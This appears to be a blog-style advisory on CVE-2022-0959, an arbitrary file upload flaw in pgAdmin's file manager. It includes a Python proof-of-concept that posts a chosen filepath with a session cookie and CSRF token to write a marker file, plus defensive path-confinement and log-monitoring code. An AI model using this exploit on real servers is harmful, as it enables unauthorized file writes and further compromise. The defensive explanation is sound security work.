CVE-2022-0959 is a significant security vulnerability discovered in pgAdmin, a popular open source administration tool for PostgreSQL databases. This post will walk you through what the vulnerability is, how it can be exploited, and show code snippets to help you understand the impact. We’ll break things down in clear and simple language.

Summary

Vulnerability: A malicious, but already logged-in and authenticated user can craft a custom HTTP request using their valid CSRF token and session cookie to upload files anywhere the pgAdmin server OS user account has permission.  
Potential Impact: Arbitrary file uploads can lead to further compromise, such as overwriting critical files, placing malicious scripts, or escalating attack scope.

Where It Happens

pgAdmin lets users browse and upload files for convenience. But the upload feature did not correctly restrict *where* files could be saved. An authenticated user can tell the server to upload files to *any* directory it has write access to, not just intended directories.

Why this matters

Being logged in shouldn't mean you can make the server write files wherever you want. In this case the flaw can be used to overwrite critical files, plant malicious scripts, or widen the scope of an attack.

How Does the Exploit Work?

pgAdmin authenticates upload requests with the user's session cookie and a CSRF token. The vulnerability is that a logged-in user can build the upload request by hand using those two values and choose the destination path themselves.

Send a crafted HTTP POST request directly to the vulnerable upload endpoint, with the file path set to any writable location.

Exploit Flow

- The user POSTs directly to the /misc/file_manager/save_file endpoint (URL may vary by version).
- They set a parameter (often called filepath) to the destination of their choice.
- Because the request carries their valid session cookies and CSRF token, pgAdmin trusts it and saves the file where they say.

Example Exploit Code

Below is a simple Python example using the popular requests library to exploit the flaw. For educational purposes only!

import requests

# Update these variables:
PGADMIN_URL = 'http://your-pgadmin-host'  # Change to your pgAdmin server
SESSION_COOKIES = {'pga4_session': '<your-session-cookie-here>'}
CSRF_TOKEN = '<your-csrf-token-here>'

# Destination chosen by the client (any path the pgAdmin OS user can write)
target_path = '/tmp/hacked.txt'
file_content = b'HACKED by CVE-2022-0959'

# Form data (field names may vary with version)
data = {
    'filepath': target_path,
    'csrf_token': CSRF_TOKEN
}

# The uploaded file itself, sent as multipart form data
files = {
    'file': ('hacked.txt', file_content)
}

upload_url = PGADMIN_URL + '/misc/file_manager/save_file'

# The session cookie and CSRF token are what make the server trust this request
response = requests.post(
    upload_url,
    data=data,
    files=files,
    cookies=SESSION_COOKIES
)

if response.status_code == 200:
    print(f'Successfully uploaded file to {target_path}')
else:
    print('Upload failed:', response.status_code, response.text)

With valid credentials and CSRF token, you can drop a file anywhere writable by the pgAdmin OS-level user.

Defensive Measures

Mitigation:  
Upgrade pgAdmin to the latest version (6.7 or later as of the patch), which restricts uploads to designated directories only.
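The root cause described above ("Where It Happens") and the fix described here come down to one check: a client-supplied name must be resolved against a configured storage root and rejected if it lands outside it. The example below is added here to illustrate that check; it is not pgAdmin's own code and not the actual patch. The function names (make_demo_root, save_file_vulnerable, is_within_root, resolve_upload_path, save_file_hardened, plant_escape_symlink) are my own, and the storage root is a throwaway temporary directory standing in for whatever directory a deployment designates.

```python
import os
import tempfile


class UnsafePathError(ValueError):
    """Requested upload path would land outside the storage root."""


def make_demo_root():
    """Create a throwaway storage root (a stand-in for the designated
    upload directory; this example knows nothing about pgAdmin's layout)."""
    return tempfile.mkdtemp(prefix="pgadmin-storage-demo-")


def save_file_vulnerable(filepath, content):
    """The pattern the advisory describes: the client-supplied path is used
    as-is, so an authenticated user can write anywhere the OS user can."""
    with open(filepath, "wb") as fh:
        fh.write(content)
    return filepath


def is_within_root(storage_root, path):
    """True if 'path' resolves to a location at or below storage_root."""
    root = os.path.realpath(storage_root)
    candidate = os.path.realpath(path)
    # commonpath() on resolved paths avoids the '/srv/data' vs
    # '/srv/data-other' mistake that a plain startswith() check makes.
    return os.path.commonpath([root, candidate]) == root


def resolve_upload_path(storage_root, requested):
    """Map a client-supplied name to an absolute path under storage_root.

    Rejects absolute paths, '..' traversal, and symlinks inside the root
    that point outside it (realpath() follows them before the check).
    """
    if os.path.isabs(requested):
        raise UnsafePathError(f"absolute paths are not allowed: {requested!r}")
    candidate = os.path.join(os.path.realpath(storage_root), requested)
    if not is_within_root(storage_root, candidate):
        raise UnsafePathError(f"path escapes storage root: {requested!r}")
    return os.path.realpath(candidate)


def save_file_hardened(storage_root, requested, content):
    """Hardened counterpart: the write is confined to storage_root."""
    dest = resolve_upload_path(storage_root, requested)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(content)
    return dest


def plant_escape_symlink(storage_root, name="link-out"):
    """Simulate a symlink inside the root that points at the root's parent,
    the classic way a purely lexical '..' check gets bypassed.
    Returns the link path, or None if symlinks cannot be created here."""
    link = os.path.join(storage_root, name)
    try:
        os.symlink(os.path.dirname(os.path.realpath(storage_root)), link)
    except OSError:
        return None
    return link


if __name__ == "__main__":
    root = make_demo_root()
    print("stored:", save_file_hardened(root, "reports/q1.csv", b"a,b\n"))
    plant_escape_symlink(root)
    for bad in ("../outside.txt", "/tmp/hacked.txt", "a/../../x.txt", "link-out/x.txt"):
        try:
            save_file_hardened(root, bad, b"x")
        except UnsafePathError as exc:
            print("rejected:", exc)
```

The order of operations matters: join first, resolve with realpath() second, compare third. Checking the raw string for ".." before resolving misses symlinks planted inside the root, and comparing with startswith() instead of commonpath() lets a sibling directory with a longer name slip through.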

Workarounds:  
- Restrict OS-level permissions for the user running pgAdmin, so they cannot write to sensitive locations.
- Monitor and alert on abnormal usage of the upload feature.
- Disable the file manager/web upload feature if unnecessary.
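One concrete form of "monitor and alert on abnormal usage" is a burst detector over the access log for the upload endpoint. The example below is added here and is not part of the original post or of pgAdmin: the log lines are constructed in a common-log-style layout, the user and IP values are made up, and the threshold of five uploads per minute is an arbitrary choice a deployment would tune. Function names (parse_uploads, find_upload_bursts) are my own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

UPLOAD_ENDPOINT = "/misc/file_manager/save_file"

# Constructed sample lines; a real deployment reads its reverse proxy or
# application access log. 'bob' fires eight uploads in seven seconds.
SAMPLE_LOG = """\
10.0.0.5 - alice [16/Mar/2022:15:01:10 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.5 - alice [16/Mar/2022:15:02:40 +0000] "GET /browser/ HTTP/1.1" 200 8123
10.0.0.9 - bob [16/Mar/2022:15:10:01 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:02 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:03 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:04 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:05 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:06 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:07 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
10.0.0.9 - bob [16/Mar/2022:15:10:08 +0000] "POST /misc/file_manager/save_file HTTP/1.1" 200 52
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_uploads(log_text):
    """Return (timestamp, user, ip) for each successful POST to the upload endpoint."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; in production count these separately
        if m["method"] != "POST" or m["path"].split("?")[0] != UPLOAD_ENDPOINT:
            continue
        if not m["status"].startswith("2"):
            continue  # only writes the server accepted are interesting here
        events.append((datetime.strptime(m["ts"], TS_FORMAT), m["user"], m["ip"]))
    return events


def find_upload_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Return {user: peak_count} for users who made at least 'threshold'
    uploads inside any sliding window of the given length."""
    by_user = defaultdict(list)
    for ts, user, _ip in events:
        by_user[user].append(ts)
    flagged = {}
    for user, stamps in by_user.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until it covers at most 'window'
            while ts - stamps[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[user] = max(flagged.get(user, 0), count)
    return flagged


if __name__ == "__main__":
    events = parse_uploads(SAMPLE_LOG)
    print(f"{len(events)} upload events parsed")
    for user, n in find_upload_bursts(events).items():
        print(f"ALERT: {user} made {n} uploads within 60s")
```

Because the destination path travels in the POST body, an access log alone cannot tell you where a file landed; pair this rate check with file-integrity monitoring on directories the pgAdmin OS user can write to.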

Final Thoughts

CVE-2022-0959 serves as a reminder: even authenticated users shouldn’t have unlimited powers. File upload endpoints must always enforce strong path and permission controls.

If you run pgAdmin, patch now and check your server logs for signs of unusual uploads. Stay safe!

Timeline

Published on: 03/16/2022 15:15:00 UTC
Last modified on: 03/28/2022 13:20:00 UTC